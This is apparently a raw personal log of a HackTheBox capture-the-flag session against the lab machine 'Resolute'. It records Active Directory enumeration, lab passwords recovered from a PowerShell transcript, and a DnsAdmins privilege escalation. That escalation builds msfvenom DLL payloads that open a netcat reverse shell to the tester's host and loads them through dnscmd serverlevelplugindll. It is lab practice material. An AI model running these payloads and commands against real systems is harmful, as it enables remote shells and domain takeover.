*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
fb18e2daec48bf3f4ff7430139441feb
*Evil-WinRM* PS C:\Users\melanie\Desktop> 

checking shares that melanie can read

└─$ crackmapexec smb 10.10.10.169 -u melanie -p Welcome123! --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [+] Enumerated shares
SMB         10.10.10.169    445    RESOLUTE         Share           Permissions     Remark
SMB         10.10.10.169    445    RESOLUTE         -----           -----------     ------
SMB         10.10.10.169    445    RESOLUTE         ADMIN$                          Remote Admin
SMB         10.10.10.169    445    RESOLUTE         C$                              Default share
SMB         10.10.10.169    445    RESOLUTE         IPC$                            Remote IPC
SMB         10.10.10.169    445    RESOLUTE         NETLOGON        READ            Logon server share 
SMB         10.10.10.169    445    RESOLUTE         SYSVOL          READ            Logon server share 

we will try winPEAS but at a glance didnt see anything glaring.will re check later

Info: Upload successful!
*Evil-WinRM* PS C:\Users\melanie\Documents> ./winPEASx64.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD

               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

  WinPEAS-ng by @hacktricks_live

       /---------------------------------------------------------------------------------\                           
       |                             Do you like PEASS?                                  |                           
       |---------------------------------------------------------------------------------|                           
       |         Get the latest version    :     https://github.com/sponsors/carlospolop |                           
       |         Follow on Twitter         :     @hacktricks_live                        |                           
       |         Respect on HTB            :     SirBroccoli                             |                           
       |---------------------------------------------------------------------------------|                           
       |                                 Thank you!                                      |                           
       \---------------------------------------------------------------------------------/                           
                                                                                                                     
  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

 You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows

bloodhound-python

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ bloodhound-python -u melanie -p 'Welcome123!' -ns 10.10.10.169 -d megabank.local -c all
INFO: Found AD domain: megabank.local
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 27 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 57S

will try sharphound/bloodhound

*Evil-WinRM* PS C:\Users\melanie\Documents> ./SharpHound.exe
-----------------------------------------------
Initializing SharpHound at 7:57 AM on 9/16/2023
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain MEGABANK.LOCAL using path CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 88 objects finished (+88 ì)/s -- Using 27 MB RAM
Enumeration finished in 00:00:00.4523615
Compressing data to .\20230916075709_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 7:57 AM on 9/16/2023! Happy Graphing!

*Evil-WinRM* PS C:\Users\melanie\Documents> ls


    Directory: C:\Users\melanie\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023   7:57 AM          10694 20230916075709_BloodHound.zip
-a----        9/16/2023   7:57 AM          15793 NGFkZWM1ODktZGZiMS00YWJmLTk0OTMtMTFkMTllMjIxYmUx.bin
-a----        9/16/2023   7:56 AM         833536 SharpHound.exe
-a----        9/16/2023   7:39 AM        2387968 winPEASx64.exe


*Evil-WinRM* PS C:\Users\melanie\Documents> download 20230916075709_BloodHound.zip
                                        
Info: Downloading C:\Users\melanie\Documents\20230916075709_BloodHound.zip to 20230916075709_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\melanie\Documents> 

tried aclpwn but no luck

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ~/.local/bin/aclpwn -f [email protected] -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Welcome123!' 
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ 

reviewing winpeas again and saw some hidden directories as

C:\Users\Default
C:\Users\DefaultUser
C:\Users\Default
C:\Users\All Users
ÉÍÍÍÍÍÍÍÍÍ͹ Looking inside the Recycle Bin for creds files
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Searching hidden files or folders in C:\Users home (can be slow)
                                                                                                                     
     C:\Users\Default
     C:\Users\Default User
     C:\Users\Default
     C:\Users\All Users

ÉÍÍÍÍÍÍÍÍÍ͹ Searching interesting files in other users home directories (can be slow)

checking all of these folders and we download NTUSER.dat,

*Evil-WinRM* PS C:\Users\Default> ls


    Directory: C:\Users\Default


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        7/16/2016   6:18 AM                Desktop
d-r---        9/25/2019  10:17 AM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        12/4/2019   5:17 AM         262144 NTUSER.DAT


*Evil-WinRM* PS C:\Users\Default> cd Documents
*Evil-WinRM* PS C:\Users\Default\Documents> ls
*Evil-WinRM* PS C:\Users\Default\Documents> cd C:\Users\"All Users"
*Evil-WinRM* PS C:\Users\All Users> ls


    Directory: C:\Users\All Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       11/20/2016   6:36 PM                Microsoft
d-----        9/25/2019  10:48 AM                Package Cache
d-----        9/25/2019  10:17 AM                regid.1991-06.com.microsoft
d-----        7/16/2016   6:18 AM                SoftwareDistribution
d-----       11/20/2016   6:19 PM                USOPrivate
d-----       11/20/2016   6:19 PM                USOShared
d-----        9/25/2019  10:48 AM                VMware


*Evil-WinRM* PS C:\Users\All Users> cd VMware
*Evil-WinRM* PS C:\Users\All Users\VMware> ls


    Directory: C:\Users\All Users\VMware


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:48 AM                VMware CAF
d-----        9/25/2019  10:49 AM                VMware Tools
d-----        9/25/2019  10:48 AM                VMware VGAuth


*Evil-WinRM* PS C:\Users\All Users\VMware> cd ----                -------------         ------ ----
^C
                                        
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\All Users\VMware> cd C:\Users\"Default User"
*Evil-WinRM* PS C:\Users\Default User> ls
Access to the path 'C:\Users\Default User' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Default User:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\Default User> 

wild goose chase with trying to enumerate NTUSER.DAT.. so gave up after trying

┌──(kali㉿kali)-[~/…/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/plugins]
└─$ perl /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl -r /home/kali/HTB/resolute/NTUSER.DAT -f ntuser

Parsed Plugins file.
Error in : Can't locate plugins/.pl in @INC (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl line 199.

 complete.
----------------------------------------
                                                                                                                                                                                   
┌──(kali㉿kali)-[~/…/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/plugins]
└─$ perl /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl -r /home/kali/HTB/resolute/NTUSER.DAT -f ntuser

Viewing hidden files via the powershell commands. We run it in C:/

Get-ChildItem -Hidden or gci -Hidden
ls -a
*Evil-WinRM* PS C:\> Get-ChildItem -Hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        9/16/2023   7:41 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        9/16/2023   7:31 AM      402653184 pagefile.sys


*Evil-WinRM* PS C:\> 

we check inside PSTranscripts but there is nothing so we check for hidden files here and we find one which i download to kal
which also contains nothing so we also check hidden files here and we find "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt"

*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> ls
*Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Hidden



    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203


*Evil-WinRM* PS C:\PSTranscripts> 
*Evil-WinRM* PS C:\PSTranscripts> download 20191203
                                        
Info: Downloading C:\PSTranscripts\20191203 to 20191203
                                        
Info: Download successful!
*Evil-WinRM* PS C:\PSTranscripts> 



    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


*Evil-WinRM* PS C:\PSTranscripts\20191203> download PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
                                        
Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt                                                                        
                                        
Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError
                                                                                                                      
          rescue EstandardError => err                                                                                
                 ^^^^^^^^^^^^^^                                                                                       
Did you mean?  StandardError                                                                                          
*Evil-WinRM* PS C:\PSTranscripts\20191203> download "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt"
                                        
Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt                                                                        
                                        
Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError
                                                                                                                      
          rescue EstandardError => err                                                                                
                 ^^^^^^^^^^^^^^                                                                                       
Did you mean?  StandardError                                                                                          
*Evil-WinRM* PS C:\PSTranscripts\20191203> cat powerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************

we find some password for ryan Serv3r4Admin4cc123!

PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

``
enumerate ryan

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123!"  
dquote> 
                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! 
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
SMB         10.10.10.169    445    RESOLUTE         [+] Enumerated shares
SMB         10.10.10.169    445    RESOLUTE         Share           Permissions     Remark
SMB         10.10.10.169    445    RESOLUTE         -----           -----------     ------
SMB         10.10.10.169    445    RESOLUTE         ADMIN$                          Remote Admin
SMB         10.10.10.169    445    RESOLUTE         C$                              Default share
SMB         10.10.10.169    445    RESOLUTE         IPC$                            Remote IPC
SMB         10.10.10.169    445    RESOLUTE         NETLOGON        READ            Logon server share 
SMB         10.10.10.169    445    RESOLUTE         SYSVOL          READ            Logon server share 

tried aclpwn again

┌──(kali㉿kali)-[~]
└─$ ~/.local/bin/aclpwn -f [email protected] -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Serv3r4Admin4cc123!'
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ 

group membership - *Domain Users *Contractors

*Evil-WinRM* PS C:\Users\ryan\Documents> net user /domain ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/16/2023 9:27:02 AM
Password expires             Never
Password changeable          9/17/2023 9:27:02 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

check more information using whoami /all . Noted that this gives more infor.we can see DNSadmin

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Found some instructions to exploit as DNSadmin

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f dll > malicious.dll

Upload to the machine

run the following command to reconfigure the DNS

dnscmd <ServerName> /config /serverlevelplugindll <Path_to_malicious_DLL>

restart the DNS service
net stop "DNS Server"
net start "DNS Server"

This may not work in evil-winrm so better to do via reverse shell


steps

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > malicious.dll 

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ nc -nlvp 444       
listening on [any] 444 ...



on kali

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll 

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

Tried to restart DNS but failed due to permisions

*Evil-WinRM* PS C:\Users\ryan\Documents> Restart-Service -Name 'DNS Server'
'Cannot access dependent services of 'DNS Server (DNS)'
At line:1 char:1
+ Restart-Service -Name 'DNS Server'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException
    + FullyQualifiedErrorId : CouldNotAccessDependentServices,Microsoft.PowerShell.Commands.RestartServiceCommand
Service 'DNS Server (DNS)' cannot be stopped due to the following error: Cannot open DNS service on computer '.'.
At line:1 char:1
+ Restart-Service -Name 'DNS Server'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException
    + FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.RestartServiceCommand
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll

Read that this may be an issue with evil-winrm. Will try do a reverse so i can run from my computer

setting up and running the reverse shell

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]

Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell.exe
                                        
Info: Uploading /home/kali/HTB/resolute/shell.exe to C:\Users\ryan\Documents\shell.exe
                                        
Data: 9556 bytes of 9556 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe

exe failed

*Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe
Program 'shell.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~.
At line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell2.exe

will try dll but kept failing

Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe path\to\shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe ./shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> pwd

Path
----
C:\Users\ryan\Documents


*Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe C:\Users\ryan\Documents\shell_x64.dll,DllMain
*Evil-WinRM* PS C:\Users\ryan\Documents> 

I found a way to restart the dns via -- sc.exe

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll 

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x4e20
        PID                : 3308
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> 

Aftert research, found that the dll we create will not work and we need t o create one that is windows/x64/exec module

1. You'll use the `windows/x64/exec` payload with the `CMD` option to run your desired command upon successful exploitation. If you wish to run a reverse shell, you can leverage something like `nc.exe` (netcat).
    
2. The following command will generate a DLL that, when loaded, will execute the specified command (in this case, a reverse shell using netcat):

msfvenom -p windows/x64/exec CMD="C:\path\to\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious.dll

msfvenom -p windows/x64/exec CMD="C:\\path\\to\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll

copying and uploading nc.exe

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ locate nc.exe          
/usr/share/windows-resources/binaries/nc.exe
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ cp /usr/share/windows-resources/binaries/nc.exe ~/HTB/resolute
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ 

*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/nc.exe
                                        
Info: Uploading /home/kali/HTB/resolute/nc.exe to C:\Users\ryan\Documents\nc.exe
                                        
Data: 79188 bytes of 79188 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> 

msfvenom

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll                                                   

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 325 bytes
Final size of dll file: 9216 bytes

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ 

load the dll using the dns service

dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

Ran and this filed. realised all dll and exe are 0 bytes buth other files upload ok

*Evil-WinRM* PS C:\Users\ryan\Documents> ls 


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll

will rename the dll to txt then upload the rename - malicious2.txt but still showing zeo

*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:59 AM              0 malicious2.txt
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll

we try a different method to upload the file i.e powershell -- invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing

kali

kali㉿kali)-[~/HTB/resolute]
└─$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.169 - - [16/Sep/2023 14:06:14] "GET /malicious6.dll HTTP/1.1" 200 -

host machine

*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023  11:02 AM              0 again.txt
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:59 AM              0 malicious2.txt
-a----        9/16/2023  11:15 AM           9216 malicious6.dll
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll
-a----        9/16/2023  11:00 AM              0 tt.txt

load into dns -- dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

reverse shell fails again.will try with x64 version of ncat 64 bit i found here - https://github.com/int0x33/nc.exe/

*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/nc64.exe -OutFile nc64.exe -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/dnshack.dll -OutFile dnshack.dll -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
